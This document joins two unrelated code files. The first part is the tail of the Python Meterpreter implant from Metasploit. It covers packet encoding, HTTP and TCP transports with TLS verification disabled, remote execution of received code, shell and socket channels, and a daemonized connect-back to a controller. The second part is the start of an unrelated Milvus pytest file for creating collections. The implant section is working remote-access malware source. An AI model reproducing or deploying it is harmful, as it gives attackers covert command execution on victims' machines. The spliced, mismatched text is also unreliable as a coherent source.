def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress),
ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type': args[0], 'value': args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
# @export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
# @export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
# @export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
# @export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l=None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l=None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
# @export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value',
SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value',
SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value',
SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
raw = xor_key[::-1] + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and (
(sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert (isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
self.debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
self.debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
self.debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddy, port))
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
sys.exit(retCode)
|
test_collection.py
|
import pdb
import pytest
import logging
import itertools
from time import sleep
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
drop_collection_interval_time = 3
index_file_size = 10
vectors = gen_vectors(100, dim)
class TestCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
def test_create_collection(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_ip(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_jaccard(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_hamming(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_substructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_superstructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_collection_without_connection(self, dis_connect):
# '''
# target: test create collection, without connection
# method: create collection with correct params, with a disconnected instance
# expected: create raise exception
# '''
# collection_name = gen_unique_str("test_collection")
# param = {'collection_name': collection_name,
# 'dimension': dim,
# 'index_file_size': index_file_size,
# 'metric_type': MetricType.L2}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_collection(param)
def test_create_collection_existed(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_collection(param)
